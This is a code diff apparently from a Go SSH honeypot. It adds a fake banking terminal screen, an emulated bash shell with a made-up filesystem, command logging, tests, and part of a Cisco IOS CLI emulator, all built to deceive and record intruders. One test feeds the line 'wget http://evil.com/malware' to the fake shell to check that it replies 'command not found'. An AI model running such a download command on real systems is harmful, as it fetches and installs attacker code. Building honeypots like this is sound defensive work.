b.WriteString(baseStyle.Render(fmt.Sprintf(" AMOUNT: $%s", m.transfer.Amount)))
b.WriteString("\n")
b.WriteString(baseStyle.Render(fmt.Sprintf(" MEMO: %s", m.transfer.Memo)))
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" CONFIRM TRANSFER? (Y/N): "))
b.WriteString(inputStyle.Render(m.confirm))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
case m.step == transferStepComplete:
b.WriteString("\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(titleStyle.Render(" TRANSFER QUEUED FOR PROCESSING"))
b.WriteString("\n\n")
routing := m.transfer.RoutingNumber
if len(routing) > 4 {
routing = routing[:4]
}
b.WriteString(baseStyle.Render(fmt.Sprintf(" CONFIRMATION #: WR-%s-%s",
routing, "847291")))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" STATUS: PENDING FEDWIRE SETTLEMENT"))
b.WriteString("\n")
b.WriteString(baseStyle.Render(" ESTIMATED COMPLETION: NEXT BUSINESS DAY"))
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
b.WriteString("\n")
case m.step < len(transferPrompts):
prompt := transferPrompts[m.step]
b.WriteString(titleStyle.Render(prompt))
b.WriteString(inputStyle.Render(m.fields[m.step]))
b.WriteString(inputStyle.Render("_"))
b.WriteString("\n")
}
if m.step < transferStepConfirm {
b.WriteString("\n")
b.WriteString(thinDivider())
b.WriteString("\n\n")
b.WriteString(dimStyle.Render(fmt.Sprintf(" STEP %d OF 6", m.step+1)))
b.WriteString("\n")
}
return b.String()
}

View File

@@ -0,0 +1,168 @@
package banking
import (
"fmt"
"strings"
"github.com/charmbracelet/lipgloss"
)
const termWidth = 80
// Color palette — green-on-black retro terminal.
var (
colorGreen = lipgloss.Color("#00FF00")
colorDim = lipgloss.Color("#007700")
colorBlack = lipgloss.Color("#000000")
colorBright = lipgloss.Color("#AAFFAA")
colorRed = lipgloss.Color("#FF3333")
)
// Reusable styles.
var (
baseStyle = lipgloss.NewStyle().
Foreground(colorGreen).
Background(colorBlack)
headerStyle = lipgloss.NewStyle().
Foreground(colorBright).
Background(colorBlack).
Bold(true).
Width(termWidth).
Align(lipgloss.Center)
titleStyle = lipgloss.NewStyle().
Foreground(colorGreen).
Background(colorBlack).
Bold(true)
dimStyle = lipgloss.NewStyle().
Foreground(colorDim).
Background(colorBlack)
errorStyle = lipgloss.NewStyle().
Foreground(colorRed).
Background(colorBlack).
Bold(true)
inputStyle = lipgloss.NewStyle().
Foreground(colorBright).
Background(colorBlack)
)
// divider returns an 80-column === line.
func divider() string {
return dimStyle.Render(strings.Repeat("=", termWidth))
}
// thinDivider returns an 80-column --- line.
func thinDivider() string {
return dimStyle.Render(strings.Repeat("-", termWidth))
}
// centerText centers text within 80 columns.
func centerText(s string) string {
return headerStyle.Render(s)
}
// padRight pads a string to the given width.
func padRight(s string, width int) string {
if len(s) >= width {
return s[:width]
}
return s + strings.Repeat(" ", width-len(s))
}
// formatCurrency formats cents as $X,XXX.XX
func formatCurrency(cents int64) string {
negative := cents < 0
if negative {
cents = -cents
}
dollars := cents / 100
remainder := cents % 100
// Add thousands separators.
ds := fmt.Sprintf("%d", dollars)
if len(ds) > 3 {
var parts []string
for len(ds) > 3 {
parts = append([]string{ds[len(ds)-3:]}, parts...)
ds = ds[:len(ds)-3]
}
parts = append([]string{ds}, parts...)
ds = strings.Join(parts, ",")
}
if negative {
return fmt.Sprintf("-$%s.%02d", ds, remainder)
}
return fmt.Sprintf("$%s.%02d", ds, remainder)
}
// padLine pads a single line (which may contain ANSI codes) to termWidth
// using its visual width. Padding uses a black background so the terminal's
// default background doesn't bleed through.
func padLine(line string) string {
w := lipgloss.Width(line)
if w >= termWidth {
return line
}
return line + baseStyle.Render(strings.Repeat(" ", termWidth-w))
}
// padLines pads every line in a multi-line string to termWidth so that
// shorter lines fully overwrite previous content in the terminal.
func padLines(s string) string {
lines := strings.Split(s, "\n")
for i, line := range lines {
lines[i] = padLine(line)
}
return strings.Join(lines, "\n")
}
// screenFrame wraps content in the persistent header and footer.
// The height parameter is used to pad the output to fill the terminal,
// preventing leftover lines from previous renders bleeding through.
func screenFrame(bankName, terminalID, region, content string, height int) string {
var b strings.Builder
// Header (4 lines).
b.WriteString(divider())
b.WriteString("\n")
b.WriteString(centerText(bankName + " FEDERAL RESERVE SYSTEM"))
b.WriteString("\n")
b.WriteString(centerText("SECURE BANKING TERMINAL"))
b.WriteString("\n")
b.WriteString(divider())
b.WriteString("\n")
// Content.
b.WriteString(content)
// Pad with blank lines between content and footer so the footer
// stays at the bottom and the total output fills the terminal height.
if height > 0 {
const headerLines = 4
const footerLines = 2
// strings.Count gives newlines; add 1 for the line after the last \n.
contentLines := strings.Count(content, "\n") + 1
used := headerLines + contentLines + footerLines
blankLine := baseStyle.Render(strings.Repeat(" ", termWidth))
for i := used; i < height; i++ {
b.WriteString(blankLine)
b.WriteString("\n")
}
}
// Footer (2 lines).
b.WriteString("\n")
b.WriteString(divider())
b.WriteString("\n")
footer := fmt.Sprintf(" TERMINAL: %s | REGION: %s | ENCRYPTED SESSION ACTIVE", terminalID, region)
b.WriteString(dimStyle.Render(padRight(footer, termWidth)))
// Pad every line to full terminal width so shorter lines overwrite
// leftover content from previous renders.
return padLines(b.String())
}

108
internal/shell/bash/bash.go Normal file
View File

@@ -0,0 +1,108 @@
package bash
import (
"context"
"errors"
"fmt"
"io"
"strings"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 5 * time.Minute
// BashShell emulates a basic bash-like shell.
type BashShell struct{}
// NewBashShell returns a new BashShell instance.
func NewBashShell() *BashShell {
return &BashShell{}
}
func (b *BashShell) Name() string { return "bash" }
func (b *BashShell) Description() string { return "Basic bash-like shell emulator" }
func (b *BashShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
username := sess.Username
if sess.CommonConfig.FakeUser != "" {
username = sess.CommonConfig.FakeUser
}
hostname := sess.CommonConfig.Hostname
fs := newFilesystem(hostname)
state := &shellState{
cwd: "/root",
username: username,
hostname: hostname,
fs: fs,
}
// Send banner.
if sess.CommonConfig.Banner != "" {
fmt.Fprint(rw, sess.CommonConfig.Banner)
}
fmt.Fprintf(rw, "Last login: %s from 10.0.0.1\r\n",
time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
for {
prompt := formatPrompt(state)
if _, err := fmt.Fprint(rw, prompt); err != nil {
return nil
}
line, err := shell.ReadLine(ctx, rw)
if errors.Is(err, io.EOF) {
fmt.Fprint(rw, "logout\r\n")
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
if trimmed == "" {
continue
}
result := dispatch(state, trimmed)
var output string
if result.output != "" {
output = result.output
// Convert newlines to \r\n for terminal display.
output = strings.ReplaceAll(output, "\r\n", "\n")
output = strings.ReplaceAll(output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
// Log command and output to store.
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("bash")
}
if result.exit {
return nil
}
}
}
func formatPrompt(state *shellState) string {
cwd := state.cwd
if cwd == "/root" {
cwd = "~"
} else if strings.HasPrefix(cwd, "/root/") {
cwd = "~" + cwd[5:]
}
return fmt.Sprintf("%s@%s:%s# ", state.username, state.hostname, cwd)
}

View File

@@ -0,0 +1,199 @@
package bash
import (
"bytes"
"context"
"errors"
"io"
"strings"
"testing"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
"code.t-juice.club/torjus/oubliette/internal/storage"
)
type rwCloser struct {
io.Reader
io.Writer
closed bool
}
func (r *rwCloser) Close() error {
r.closed = true
return nil
}
func TestFormatPrompt(t *testing.T) {
tests := []struct {
cwd string
want string
}{
{"/root", "root@host:~# "},
{"/root/sub", "root@host:~/sub# "},
{"/tmp", "root@host:/tmp# "},
{"/", "root@host:/# "},
}
for _, tt := range tests {
state := &shellState{cwd: tt.cwd, username: "root", hostname: "host"}
got := formatPrompt(state)
if got != tt.want {
t.Errorf("formatPrompt(cwd=%q) = %q, want %q", tt.cwd, got, tt.want)
}
}
}
func TestReadLineEnter(t *testing.T) {
input := bytes.NewBufferString("hello\r")
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
line, err := shell.ReadLine(ctx, rw)
if err != nil {
t.Fatalf("readLine: %v", err)
}
if line != "hello" {
t.Errorf("line = %q, want %q", line, "hello")
}
}
func TestReadLineBackspace(t *testing.T) {
// Type "helo", backspace, then "lo\r"
input := bytes.NewBuffer([]byte{'h', 'e', 'l', 'o', 127, 'l', 'o', '\r'})
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
line, err := shell.ReadLine(ctx, rw)
if err != nil {
t.Fatalf("readLine: %v", err)
}
if line != "hello" {
t.Errorf("line = %q, want %q", line, "hello")
}
}
func TestReadLineCtrlC(t *testing.T) {
input := bytes.NewBuffer([]byte("partial\x03"))
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
line, err := shell.ReadLine(ctx, rw)
if err != nil {
t.Fatalf("readLine: %v", err)
}
if line != "" {
t.Errorf("line after Ctrl+C = %q, want empty", line)
}
}
func TestReadLineCtrlD(t *testing.T) {
input := bytes.NewBuffer([]byte{4}) // Ctrl+D on empty line
var output bytes.Buffer
rw := struct {
io.Reader
io.Writer
}{input, &output}
ctx := context.Background()
_, err := shell.ReadLine(ctx, rw)
if !errors.Is(err, io.EOF) {
t.Fatalf("expected io.EOF, got %v", err)
}
}
func TestBashShellHandle(t *testing.T) {
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "bash", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "root",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
},
}
// Simulate typing commands followed by "exit\r"
commands := "pwd\rwhoami\rexit\r"
clientInput := bytes.NewBufferString(commands)
var clientOutput bytes.Buffer
rw := &rwCloser{
Reader: clientInput,
Writer: &clientOutput,
}
sh := NewBashShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
err := sh.Handle(ctx, sess, rw)
if err != nil {
t.Fatalf("Handle: %v", err)
}
output := clientOutput.String()
// Should contain banner.
if !strings.Contains(output, "Welcome to Ubuntu") {
t.Error("output should contain banner")
}
// Should contain prompt with hostname.
if !strings.Contains(output, "root@testhost") {
t.Errorf("output should contain prompt, got: %s", output)
}
// Check session logs were recorded.
if len(store.SessionLogs) < 2 {
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
}
}
func TestBashShellFakeUser(t *testing.T) {
store := storage.NewMemoryStore()
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "attacker", "bash", "")
sess := &shell.SessionContext{
SessionID: sessID,
Username: "attacker",
Store: store,
CommonConfig: shell.ShellCommonConfig{
Hostname: "testhost",
FakeUser: "admin",
},
}
commands := "whoami\rexit\r"
clientInput := bytes.NewBufferString(commands)
var clientOutput bytes.Buffer
rw := &rwCloser{
Reader: clientInput,
Writer: &clientOutput,
}
sh := NewBashShell()
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
sh.Handle(ctx, sess, rw)
output := clientOutput.String()
if !strings.Contains(output, "admin") {
t.Errorf("output should contain fake user 'admin', got: %s", output)
}
}

View File

@@ -0,0 +1,119 @@
package bash
import (
"fmt"
"runtime"
"sort"
"strings"
)
type shellState struct {
cwd string
username string
hostname string
fs *filesystem
}
type commandResult struct {
output string
exit bool
}
func dispatch(state *shellState, line string) commandResult {
fields := strings.Fields(line)
if len(fields) == 0 {
return commandResult{}
}
cmd := fields[0]
args := fields[1:]
switch cmd {
case "pwd":
return commandResult{output: state.cwd}
case "whoami":
return commandResult{output: state.username}
case "hostname":
return commandResult{output: state.hostname}
case "id":
return cmdID(state)
case "uname":
return cmdUname(state, args)
case "ls":
return cmdLs(state, args)
case "cd":
return cmdCd(state, args)
case "cat":
return cmdCat(state, args)
case "exit", "logout":
return commandResult{exit: true}
default:
return commandResult{output: fmt.Sprintf("%s: command not found", cmd)}
}
}
func cmdID(state *shellState) commandResult {
return commandResult{
output: fmt.Sprintf("uid=0(%s) gid=0(%s) groups=0(%s)", state.username, state.username, state.username),
}
}
func cmdUname(state *shellState, args []string) commandResult {
if len(args) > 0 && args[0] == "-a" {
return commandResult{
output: fmt.Sprintf("Linux %s 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 %s GNU/Linux", state.hostname, runtime.GOARCH),
}
}
return commandResult{output: "Linux"}
}
func cmdLs(state *shellState, args []string) commandResult {
target := state.cwd
if len(args) > 0 {
target = resolvePath(state.cwd, args[0])
}
names, err := state.fs.list(target)
if err != nil {
return commandResult{output: err.Error()}
}
sort.Strings(names)
return commandResult{output: strings.Join(names, " ")}
}
func cmdCd(state *shellState, args []string) commandResult {
target := "/root"
if len(args) > 0 {
target = resolvePath(state.cwd, args[0])
}
if !state.fs.exists(target) {
return commandResult{output: fmt.Sprintf("bash: cd: %s: No such file or directory", args[0])}
}
if !state.fs.isDirectory(target) {
return commandResult{output: fmt.Sprintf("bash: cd: %s: Not a directory", args[0])}
}
state.cwd = target
return commandResult{}
}
func cmdCat(state *shellState, args []string) commandResult {
if len(args) == 0 {
return commandResult{}
}
var parts []string
for _, arg := range args {
p := resolvePath(state.cwd, arg)
content, err := state.fs.read(p)
if err != nil {
parts = append(parts, err.Error())
} else {
parts = append(parts, strings.TrimRight(content, "\n"))
}
}
return commandResult{output: strings.Join(parts, "\n")}
}

View File

@@ -0,0 +1,201 @@
package bash
import (
"strings"
"testing"
)
func newTestState() *shellState {
fs := newFilesystem("testhost")
return &shellState{
cwd: "/root",
username: "root",
hostname: "testhost",
fs: fs,
}
}
func TestCmdPwd(t *testing.T) {
state := newTestState()
r := dispatch(state, "pwd")
if r.output != "/root" {
t.Errorf("pwd = %q, want %q", r.output, "/root")
}
}
func TestCmdWhoami(t *testing.T) {
state := newTestState()
r := dispatch(state, "whoami")
if r.output != "root" {
t.Errorf("whoami = %q, want %q", r.output, "root")
}
}
func TestCmdHostname(t *testing.T) {
state := newTestState()
r := dispatch(state, "hostname")
if r.output != "testhost" {
t.Errorf("hostname = %q, want %q", r.output, "testhost")
}
}
func TestCmdId(t *testing.T) {
state := newTestState()
r := dispatch(state, "id")
if !strings.Contains(r.output, "uid=0(root)") {
t.Errorf("id output = %q, want uid=0(root)", r.output)
}
}
func TestCmdUnameBasic(t *testing.T) {
state := newTestState()
r := dispatch(state, "uname")
if r.output != "Linux" {
t.Errorf("uname = %q, want %q", r.output, "Linux")
}
}
func TestCmdUnameAll(t *testing.T) {
state := newTestState()
r := dispatch(state, "uname -a")
if !strings.HasPrefix(r.output, "Linux testhost") {
t.Errorf("uname -a = %q, want prefix 'Linux testhost'", r.output)
}
}
func TestCmdLs(t *testing.T) {
state := newTestState()
r := dispatch(state, "ls")
if r.output == "" {
t.Error("ls should return non-empty output")
}
}
func TestCmdLsPath(t *testing.T) {
state := newTestState()
r := dispatch(state, "ls /etc")
if !strings.Contains(r.output, "passwd") {
t.Errorf("ls /etc = %q, should contain 'passwd'", r.output)
}
}
func TestCmdLsNonexistent(t *testing.T) {
state := newTestState()
r := dispatch(state, "ls /nope")
if !strings.Contains(r.output, "No such file") {
t.Errorf("ls /nope = %q, should contain 'No such file'", r.output)
}
}
func TestCmdCd(t *testing.T) {
state := newTestState()
r := dispatch(state, "cd /tmp")
if r.output != "" {
t.Errorf("cd /tmp should produce no output, got %q", r.output)
}
if state.cwd != "/tmp" {
t.Errorf("cwd = %q, want %q", state.cwd, "/tmp")
}
}
func TestCmdCdNonexistent(t *testing.T) {
state := newTestState()
r := dispatch(state, "cd /nope")
if !strings.Contains(r.output, "No such file") {
t.Errorf("cd /nope = %q, should contain 'No such file'", r.output)
}
}
func TestCmdCdNoArgs(t *testing.T) {
state := newTestState()
state.cwd = "/tmp"
dispatch(state, "cd")
if state.cwd != "/root" {
t.Errorf("cd with no args should go to /root, got %q", state.cwd)
}
}
func TestCmdCdRelative(t *testing.T) {
state := newTestState()
state.cwd = "/var"
dispatch(state, "cd log")
if state.cwd != "/var/log" {
t.Errorf("cwd = %q, want %q", state.cwd, "/var/log")
}
}
func TestCmdCdDotDot(t *testing.T) {
state := newTestState()
state.cwd = "/var/log"
dispatch(state, "cd ..")
if state.cwd != "/var" {
t.Errorf("cwd = %q, want %q", state.cwd, "/var")
}
}
func TestCmdCat(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /etc/hostname")
if !strings.Contains(r.output, "testhost") {
t.Errorf("cat /etc/hostname = %q, should contain 'testhost'", r.output)
}
}
func TestCmdCatNonexistent(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /nope")
if !strings.Contains(r.output, "No such file") {
t.Errorf("cat /nope = %q, should contain 'No such file'", r.output)
}
}
func TestCmdCatDirectory(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /etc")
if !strings.Contains(r.output, "Is a directory") {
t.Errorf("cat /etc = %q, should contain 'Is a directory'", r.output)
}
}
func TestCmdCatMultiple(t *testing.T) {
state := newTestState()
r := dispatch(state, "cat /etc/hostname /root/README.txt")
if !strings.Contains(r.output, "testhost") || !strings.Contains(r.output, "DO NOT MODIFY") {
t.Errorf("cat multiple files = %q, should contain both file contents", r.output)
}
}
func TestCmdExit(t *testing.T) {
state := newTestState()
r := dispatch(state, "exit")
if !r.exit {
t.Error("exit should set exit=true")
}
}
func TestCmdLogout(t *testing.T) {
state := newTestState()
r := dispatch(state, "logout")
if !r.exit {
t.Error("logout should set exit=true")
}
}
func TestCmdNotFound(t *testing.T) {
state := newTestState()
r := dispatch(state, "wget http://evil.com/malware")
if !strings.Contains(r.output, "command not found") {
t.Errorf("unknown cmd = %q, should contain 'command not found'", r.output)
}
if !strings.HasPrefix(r.output, "wget:") {
t.Errorf("unknown cmd = %q, should start with 'wget:'", r.output)
}
}
func TestCmdEmptyLine(t *testing.T) {
state := newTestState()
r := dispatch(state, "")
if r.output != "" || r.exit {
t.Errorf("empty line should produce no output and not exit")
}
}

View File

@@ -0,0 +1,166 @@
package bash
import (
"fmt"
"path"
"strings"
)
type fsNode struct {
name string
isDir bool
content string
children map[string]*fsNode
}
type filesystem struct {
root *fsNode
}
func newFilesystem(hostname string) *filesystem {
fs := &filesystem{
root: &fsNode{name: "/", isDir: true, children: make(map[string]*fsNode)},
}
fs.mkdirAll("/etc")
fs.mkdirAll("/root")
fs.mkdirAll("/home")
fs.mkdirAll("/var/log")
fs.mkdirAll("/tmp")
fs.mkdirAll("/usr/bin")
fs.mkdirAll("/usr/local")
fs.writeFile("/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"+
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"+
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"+
"mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false\n")
fs.writeFile("/etc/hostname", hostname+"\n")
fs.writeFile("/etc/hosts", "127.0.0.1\tlocalhost\n"+
"127.0.1.1\t"+hostname+"\n"+
"::1\t\tlocalhost ip6-localhost ip6-loopback\n")
fs.writeFile("/root/.bash_history",
"apt update\n"+
"apt upgrade -y\n"+
"systemctl restart nginx\n"+
"tail -f /var/log/syslog\n"+
"df -h\n"+
"free -m\n"+
"netstat -tlnp\n"+
"cat /etc/passwd\n")
fs.writeFile("/root/.bashrc",
"# ~/.bashrc: executed by bash(1) for non-login shells.\n"+
"export PS1='\\u@\\h:\\w\\$ '\n"+
"alias ll='ls -alF'\n"+
"alias la='ls -A'\n")
fs.writeFile("/root/README.txt", "Production server - DO NOT MODIFY\n")
fs.writeFile("/var/log/syslog",
"Jan 12 03:14:22 "+hostname+" systemd[1]: Started Daily apt download activities.\n"+
"Jan 12 03:14:23 "+hostname+" systemd[1]: Started Daily Cleanup of Temporary Directories.\n"+
"Jan 12 04:00:01 "+hostname+" CRON[12345]: (root) CMD (/usr/local/bin/backup.sh)\n"+
"Jan 12 04:00:03 "+hostname+" kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.42 DST=10.0.0.5 PROTO=TCP DPT=22\n")
fs.writeFile("/tmp/notes.txt", "TODO: Update SSL certificates\n")
return fs
}
// resolvePath converts a potentially relative path to an absolute one.
func resolvePath(cwd, p string) string {
if !strings.HasPrefix(p, "/") {
p = cwd + "/" + p
}
return path.Clean(p)
}
func (fs *filesystem) lookup(p string) *fsNode {
p = path.Clean(p)
if p == "/" {
return fs.root
}
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
node := fs.root
for _, part := range parts {
if node.children == nil {
return nil
}
child, ok := node.children[part]
if !ok {
return nil
}
node = child
}
return node
}
func (fs *filesystem) exists(p string) bool {
return fs.lookup(p) != nil
}
func (fs *filesystem) isDirectory(p string) bool {
n := fs.lookup(p)
return n != nil && n.isDir
}
func (fs *filesystem) list(p string) ([]string, error) {
n := fs.lookup(p)
if n == nil {
return nil, fmt.Errorf("ls: cannot access '%s': No such file or directory", p)
}
if !n.isDir {
return nil, fmt.Errorf("ls: cannot access '%s': Not a directory", p)
}
names := make([]string, 0, len(n.children))
for name, child := range n.children {
if child.isDir {
name += "/"
}
names = append(names, name)
}
return names, nil
}
func (fs *filesystem) read(p string) (string, error) {
n := fs.lookup(p)
if n == nil {
return "", fmt.Errorf("cat: %s: No such file or directory", p)
}
if n.isDir {
return "", fmt.Errorf("cat: %s: Is a directory", p)
}
return n.content, nil
}
func (fs *filesystem) mkdirAll(p string) {
p = path.Clean(p)
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
node := fs.root
for _, part := range parts {
if node.children == nil {
node.children = make(map[string]*fsNode)
}
child, ok := node.children[part]
if !ok {
child = &fsNode{name: part, isDir: true, children: make(map[string]*fsNode)}
node.children[part] = child
}
node = child
}
}
func (fs *filesystem) writeFile(p string, content string) {
p = path.Clean(p)
dir := path.Dir(p)
base := path.Base(p)
fs.mkdirAll(dir)
parent := fs.lookup(dir)
parent.children[base] = &fsNode{name: base, content: content}
}

View File

@@ -0,0 +1,140 @@
package bash
import (
"sort"
"testing"
)
func TestNewFilesystem(t *testing.T) {
fs := newFilesystem("testhost")
// Standard directories should exist.
for _, dir := range []string{"/etc", "/root", "/home", "/var/log", "/tmp", "/usr/bin"} {
if !fs.isDirectory(dir) {
t.Errorf("%s should be a directory", dir)
}
}
// Standard files should exist.
for _, file := range []string{"/etc/passwd", "/etc/hostname", "/root/.bashrc", "/tmp/notes.txt"} {
if !fs.exists(file) {
t.Errorf("%s should exist", file)
}
}
}
func TestFilesystemHostname(t *testing.T) {
fs := newFilesystem("myhost")
content, err := fs.read("/etc/hostname")
if err != nil {
t.Fatalf("read /etc/hostname: %v", err)
}
if content != "myhost\n" {
t.Errorf("hostname content = %q, want %q", content, "myhost\n")
}
}
func TestResolvePath(t *testing.T) {
tests := []struct {
cwd string
arg string
want string
}{
{"/root", "file.txt", "/root/file.txt"},
{"/root", "/etc/passwd", "/etc/passwd"},
{"/root", "..", "/"},
{"/var/log", "../..", "/"},
{"/root", ".", "/root"},
{"/root", "./sub/file", "/root/sub/file"},
{"/", "etc", "/etc"},
}
for _, tt := range tests {
got := resolvePath(tt.cwd, tt.arg)
if got != tt.want {
t.Errorf("resolvePath(%q, %q) = %q, want %q", tt.cwd, tt.arg, got, tt.want)
}
}
}
func TestFilesystemList(t *testing.T) {
fs := newFilesystem("testhost")
names, err := fs.list("/etc")
if err != nil {
t.Fatalf("list /etc: %v", err)
}
sort.Strings(names)
// Should contain at least passwd, hostname, hosts.
found := map[string]bool{}
for _, n := range names {
found[n] = true
}
for _, want := range []string{"passwd", "hostname", "hosts"} {
if !found[want] {
t.Errorf("list /etc missing %q, got %v", want, names)
}
}
}
func TestFilesystemListNonexistent(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.list("/nonexistent")
if err == nil {
t.Fatal("expected error listing nonexistent directory")
}
}
func TestFilesystemListFile(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.list("/etc/passwd")
if err == nil {
t.Fatal("expected error listing a file")
}
}
func TestFilesystemRead(t *testing.T) {
fs := newFilesystem("testhost")
content, err := fs.read("/etc/passwd")
if err != nil {
t.Fatalf("read: %v", err)
}
if content == "" {
t.Error("expected non-empty content")
}
}
func TestFilesystemReadNonexistent(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.read("/no/such/file")
if err == nil {
t.Fatal("expected error for nonexistent file")
}
}
func TestFilesystemReadDirectory(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.read("/etc")
if err == nil {
t.Fatal("expected error for reading a directory")
}
}
func TestFilesystemDirectoryListing(t *testing.T) {
fs := newFilesystem("testhost")
names, err := fs.list("/")
if err != nil {
t.Fatalf("list /: %v", err)
}
// Root directories should end with /
found := map[string]bool{}
for _, n := range names {
found[n] = true
}
for _, want := range []string{"etc/", "root/", "home/", "var/", "tmp/", "usr/"} {
if !found[want] {
t.Errorf("list / missing %q, got %v", want, names)
}
}
}

View File

@@ -0,0 +1,206 @@
package cisco
import (
"context"
"errors"
"fmt"
"io"
"strings"
"time"
"code.t-juice.club/torjus/oubliette/internal/shell"
)
const sessionTimeout = 5 * time.Minute
// CiscoShell emulates a Cisco IOS CLI.
type CiscoShell struct{}
// NewCiscoShell returns a new CiscoShell instance.
func NewCiscoShell() *CiscoShell {
return &CiscoShell{}
}
func (c *CiscoShell) Name() string { return "cisco" }
func (c *CiscoShell) Description() string { return "Cisco IOS CLI emulator" }
func (c *CiscoShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
defer cancel()
hostname := configString(sess.ShellConfig, "hostname", "Router")
model := configString(sess.ShellConfig, "model", "C2960")
iosVersion := configString(sess.ShellConfig, "ios_version", "15.0(2)SE11")
enablePass := configString(sess.ShellConfig, "enable_password", "")
state := newIOSState(hostname, model, iosVersion, enablePass)
// IOS just shows a blank line then the prompt after SSH auth.
fmt.Fprint(rw, "\r\n")
for {
prompt := state.prompt()
if _, err := fmt.Fprint(rw, prompt); err != nil {
return nil
}
line, err := shell.ReadLine(ctx, rw)
if errors.Is(err, io.EOF) {
return nil
}
if err != nil {
return nil
}
trimmed := strings.TrimSpace(line)
if trimmed == "" {
continue
}
// Check for Ctrl+Z (^Z) — return to privileged exec.
if trimmed == "\x1a" || trimmed == "^Z" {
if state.mode == modeGlobalConfig || state.mode == modeInterfaceConfig {
state.mode = modePrivilegedExec
state.currentIf = ""
}
continue
}
// Handle "enable" specially — it needs password prompting.
if state.mode == modeUserExec && isEnableCommand(trimmed) {
output := handleEnable(ctx, state, rw)
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("cisco")
}
continue
}
result := state.dispatch(trimmed)
var output string
if result.output != "" {
output = result.output
output = strings.ReplaceAll(output, "\r\n", "\n")
output = strings.ReplaceAll(output, "\n", "\r\n")
fmt.Fprintf(rw, "%s\r\n", output)
}
if sess.Store != nil {
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
return fmt.Errorf("append session log: %w", err)
}
}
if sess.OnCommand != nil {
sess.OnCommand("cisco")
}
if result.exit {
return nil
}
}
}
// isEnableCommand checks if input resolves to "enable" in user exec mode.
func isEnableCommand(input string) bool {
words := strings.Fields(input)
if len(words) != 1 {
return false
}
w := strings.ToLower(words[0])
enable := "enable"
return len(w) >= 2 && len(w) <= len(enable) && enable[:len(w)] == w
}
// handleEnable manages the enable password prompt flow.
// Returns the output string (for logging).
func handleEnable(ctx context.Context, state *iosState, rw io.ReadWriter) string {
const maxAttempts = 3
hadFailure := false
for range maxAttempts {
fmt.Fprint(rw, "Password: ")
password, err := readPassword(ctx, rw)
if err != nil {
return ""
}
fmt.Fprint(rw, "\r\n")
if state.enablePass == "" {
// No password configured — accept after one failed attempt.
if hadFailure {
state.mode = modePrivilegedExec
return ""
}
hadFailure = true
} else if password == state.enablePass {
state.mode = modePrivilegedExec
return ""
}
}
output := "% Bad passwords"
fmt.Fprintf(rw, "%s\r\n", output)
return output
}
// readPassword reads a password without echoing characters.
func readPassword(ctx context.Context, rw io.ReadWriter) (string, error) {
var buf []byte
b := make([]byte, 1)
for {
select {
case <-ctx.Done():
return "", ctx.Err()
default:
}
n, err := rw.Read(b)
if err != nil {
return "", err
}
if n == 0 {
continue
}
ch := b[0]
switch {
case ch == '\r' || ch == '\n':
return string(buf), nil
case ch == 4: // Ctrl+D
return string(buf), io.EOF
case ch == 3: // Ctrl+C
return "", io.EOF
case ch == 127 || ch == 8: // Backspace/DEL
if len(buf) > 0 {
buf = buf[:len(buf)-1]
}
case ch == 27: // ESC sequence
next := make([]byte, 1)
if n, _ := rw.Read(next); n > 0 && next[0] == '[' {
rw.Read(next)
}
case ch >= 32 && ch < 127:
buf = append(buf, ch)
// Don't echo.
}
}
}
// configString reads a string from the shell config map with a default.
func configString(cfg map[string]any, key, defaultVal string) string {
if cfg == nil {
return defaultVal
}
if v, ok := cfg[key]; ok {
